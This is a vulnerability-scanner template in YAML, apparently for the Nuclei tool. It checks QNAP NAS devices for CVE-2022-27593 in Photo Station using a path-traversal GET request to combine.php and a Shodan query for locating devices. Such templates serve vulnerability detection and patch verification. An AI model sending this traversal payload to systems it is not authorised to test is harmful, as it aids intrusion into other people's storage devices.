id: CVE-2022-27593

info:
  name: QNAP QTS Photo Station External Reference
  author: allenwest24
  severity: critical
  description: |
    An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later
  reference:
    - https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593
    - https://www.qnap.com/en/security-advisory/qsa-22-24
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27593
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-27593
    cwe-id: CWE-610
  metadata:
    verified: true
    shodan-query: title:"QNAP"
  tags: cve,cve2022,qnap,lfi,kev

requests:
  - method: GET
    path:
      - "{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - "!function(p,qa){"
          - "module.exports"
          - "application/javascript"
        condition: and

      - type: status
        status:
          - 200